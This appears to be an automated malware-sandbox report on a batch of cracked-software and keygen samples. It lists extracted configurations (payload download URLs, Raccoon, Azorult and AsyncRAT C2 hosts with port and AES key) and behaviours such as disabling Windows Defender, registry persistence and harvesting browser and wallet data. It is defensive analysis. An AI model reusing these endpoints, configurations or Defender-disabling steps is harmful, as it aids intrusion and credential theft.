Overview
overview
10Static
static
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
3ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
8ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
10ฺฺฺK...ฺฺ
windows10_x64
1ฺฺฺK...ฺฺ
windows10_x64
4Resubmissions
18-11-2020 14:18
201118-dj27sn3f52 1018-11-2020 13:42
201118-1arz86e7w6 1018-11-2020 13:38
201118-n8jh228ctn 10Analysis
-
max time kernel
1802s -
max time network
1815s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 13:42
Static task
static1
Behavioral task
behavioral1
Sample
2019-09-02_22-41-10.bin.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
31.bin.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
3DMark 11 Advanced Edition.bin.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Archive.zip__ccacaxs2tbz2t6ob3e.bin.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
CVE-2018-15982_PoC.swf
Resource
win10v20201028
Behavioral task
behavioral6
Sample
DiskInternals_Uneraser_v5_keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
ForceOp 2.8.7 - By RaiSence.bin.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
HYDRA.bin.exe
Resource
win10v20201028
Behavioral task
behavioral9
Sample
Keygen.bin.exe
Resource
win10v20201028
Behavioral task
behavioral10
Sample
LtHv0O2KZDK4M637.bin.exe
Resource
win10v20201028
Behavioral task
behavioral11
Sample
OnlineInstaller.bin.exe
Resource
win10v20201028
Behavioral task
behavioral12
Sample
Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.bin.exe
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Treasure.Vault.3D.Screensaver.keygen.by.Paradox.bin.exe
Resource
win10v20201028
Behavioral task
behavioral14
Sample
VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
Behavioral task
behavioral16
Sample
api.exe
Resource
win10v20201028
Behavioral task
behavioral17
Sample
efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js
Resource
win10v20201028
Behavioral task
behavioral18
Sample
good.bin.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
infected dot net installer.bin.exe
Resource
win10v20201028
Behavioral task
behavioral20
Sample
update.bin.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
vir1.xls
Resource
win10v20201028
Behavioral task
behavioral22
Sample
xNet.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
1.bin.exe
Resource
win10v20201028
Behavioral task
behavioral24
Sample
VPN/VyprVPN.exe
Resource
win10v20201028
Behavioral task
behavioral25
Sample
VPN/xNet.dll
Resource
win10v20201028
Behavioral task
behavioral26
Sample
WSHSetup[1].bin.exe
Resource
win10v20201028
General
Malware Config
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
raccoon
c6f4c67877b4427c759f396ca4c1dff4761d3cc9
-
url4cnc
https://telete.in/brikitiki
Extracted
azorult
http://195.245.112.115/index.php
Extracted
asyncrat
0.5.7B
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
AsyncMutex_6SI8OkPnk
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral9/memory/2424-231-0x0000000000400000-0x000000000040C000-memory.dmp disable_win_def behavioral9/memory/2424-232-0x000000000040616E-mapping.dmp disable_win_def behavioral9/memory/3312-248-0x0000000000400000-0x0000000000408000-memory.dmp disable_win_def behavioral9/memory/3312-249-0x0000000000403BEE-mapping.dmp disable_win_def C:\Windows\temp\vokybpfg.exe disable_win_def C:\Windows\Temp\vokybpfg.exe disable_win_def behavioral9/memory/3432-794-0x000000000040616E-mapping.dmp disable_win_def behavioral9/memory/6040-788-0x0000000000403BEE-mapping.dmp disable_win_def C:\Windows\temp\wmimpxhi.exe disable_win_def C:\Windows\Temp\wmimpxhi.exe disable_win_def -
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Async RAT payload 3 IoCs
Processes:
resource yara_rule behavioral9/memory/4164-221-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral9/memory/4164-222-0x000000000040C76E-mapping.dmp asyncrat behavioral9/memory/3672-720-0x000000000040C76E-mapping.dmp asyncrat -
ModiLoader First Stage 2 IoCs
Processes:
resource yara_rule behavioral9/memory/4180-280-0x0000000002120000-0x0000000002130000-memory.dmp modiloader_stage1 behavioral9/memory/5868-707-0x0000000002260000-0x0000000002270000-memory.dmp modiloader_stage1 -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 22 4088 powershell.exe 23 1528 powershell.exe 24 3608 powershell.exe 28 4088 powershell.exe 29 1528 powershell.exe 30 3608 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
Processes:
Keygen.exemkx.exetxi.exepvr.exezVhjgfutyFD.exeHuytgfGDFwer.exemkx.exezVhjgfutyFD.exeHuytgfGDFwer.exe3glqQ5zu6q.exeFcIiEO8Bol.exeZfog5KVMBE.exeSmMNW0P9JH.exe3glqQ5zu6q.exe3glqQ5zu6q.exe3glqQ5zu6q.exeZfog5KVMBE.exeZfog5KVMBE.exeSmMNW0P9JH.exevokybpfg.exeaxcjgfhwvvas.exetxi.exeoscjgfhwvvas.exeaxcjgfhwvvas.exeQ0ASSF3gqn.exeeJZoW1GjJt.exetdwmwhz8zi.exe1nONCENDZY.exeQ0ASSF3gqn.exeoscjgfhwvvas.exetdwmwhz8zi.exetdwmwhz8zi.exe1nONCENDZY.exetdwmwhz8zi.exewmimpxhi.exepid process 504 Keygen.exe 5024 mkx.exe 5116 txi.exe 5104 pvr.exe 4468 zVhjgfutyFD.exe 4476 HuytgfGDFwer.exe 4272 mkx.exe 4652 zVhjgfutyFD.exe 4668 HuytgfGDFwer.exe 3560 3glqQ5zu6q.exe 4180 FcIiEO8Bol.exe 3764 Zfog5KVMBE.exe 4004 SmMNW0P9JH.exe 2120 3glqQ5zu6q.exe 3960 3glqQ5zu6q.exe 4164 3glqQ5zu6q.exe 1328 Zfog5KVMBE.exe 2424 Zfog5KVMBE.exe 3312 SmMNW0P9JH.exe 4924 vokybpfg.exe 5500 axcjgfhwvvas.exe 5520 txi.exe 3060 oscjgfhwvvas.exe 3100 axcjgfhwvvas.exe 4360 Q0ASSF3gqn.exe 5868 eJZoW1GjJt.exe 4776 tdwmwhz8zi.exe 6000 1nONCENDZY.exe 3672 Q0ASSF3gqn.exe 5044 oscjgfhwvvas.exe 6048 tdwmwhz8zi.exe 4512 tdwmwhz8zi.exe 6040 1nONCENDZY.exe 3432 tdwmwhz8zi.exe 6092 wmimpxhi.exe -
Modifies Installed Components in the registry 2 TTPs
-
Loads dropped DLL 22 IoCs
Processes:
mkx.exeHuytgfGDFwer.exetxi.exeoscjgfhwvvas.exepid process 4272 mkx.exe 4668 HuytgfGDFwer.exe 4668 HuytgfGDFwer.exe 4668 HuytgfGDFwer.exe 4272 mkx.exe 4272 mkx.exe 4272 mkx.exe 4272 mkx.exe 4272 mkx.exe 4272 mkx.exe 4272 mkx.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5520 txi.exe 5044 oscjgfhwvvas.exe 5044 oscjgfhwvvas.exe 5044 oscjgfhwvvas.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
SmMNW0P9JH.exe1nONCENDZY.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features SmMNW0P9JH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" SmMNW0P9JH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1nONCENDZY.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
FcIiEO8Bol.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Klfn = "C:\\Users\\Admin\\AppData\\Local\\nflK.url" FcIiEO8Bol.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
Processes:
txi.exemkx.exedescription ioc process File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini txi.exe File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini mkx.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
explorer.exedescription ioc process File opened (read-only) \??\D: explorer.exe -
Suspicious use of SetThreadContext 12 IoCs
Processes:
mkx.exezVhjgfutyFD.exeHuytgfGDFwer.exe3glqQ5zu6q.exeZfog5KVMBE.exeSmMNW0P9JH.exetxi.exeaxcjgfhwvvas.exeQ0ASSF3gqn.exeoscjgfhwvvas.exe1nONCENDZY.exetdwmwhz8zi.exedescription pid process target process PID 5024 set thread context of 4272 5024 mkx.exe mkx.exe PID 4468 set thread context of 4652 4468 zVhjgfutyFD.exe zVhjgfutyFD.exe PID 4476 set thread context of 4668 4476 HuytgfGDFwer.exe HuytgfGDFwer.exe PID 3560 set thread context of 4164 3560 3glqQ5zu6q.exe 3glqQ5zu6q.exe PID 3764 set thread context of 2424 3764 Zfog5KVMBE.exe Zfog5KVMBE.exe PID 4004 set thread context of 3312 4004 SmMNW0P9JH.exe SmMNW0P9JH.exe PID 5116 set thread context of 5520 5116 txi.exe txi.exe PID 5500 set thread context of 3100 5500 axcjgfhwvvas.exe axcjgfhwvvas.exe PID 4360 set thread context of 3672 4360 Q0ASSF3gqn.exe Q0ASSF3gqn.exe PID 3060 set thread context of 5044 3060 oscjgfhwvvas.exe oscjgfhwvvas.exe PID 6000 set thread context of 6040 6000 1nONCENDZY.exe 1nONCENDZY.exe PID 4776 set thread context of 3432 4776 tdwmwhz8zi.exe tdwmwhz8zi.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
explorer.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
HuytgfGDFwer.exeoscjgfhwvvas.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HuytgfGDFwer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString oscjgfhwvvas.exe -
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid process 1436 timeout.exe 3680 timeout.exe 2564 timeout.exe 3428 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
SearchUI.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2844 taskkill.exe 956 taskkill.exe 4908 taskkill.exe 4560 taskkill.exe -
Modifies registry class 30 IoCs
Processes:
cmd.exeSearchUI.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" SearchUI.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance explorer.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "132483827320340134" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010005000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e4070b005600610067007200650061007200670020006e00700070007200660066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000004f351c79babdd60100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e4070b004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000073ae2078e323294282c1e41cb67d5b9c00000000000000000000000040971e79babdd60100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e4070a004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc760000000000000000000000005aa40d5557add60100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e4070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e4070a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000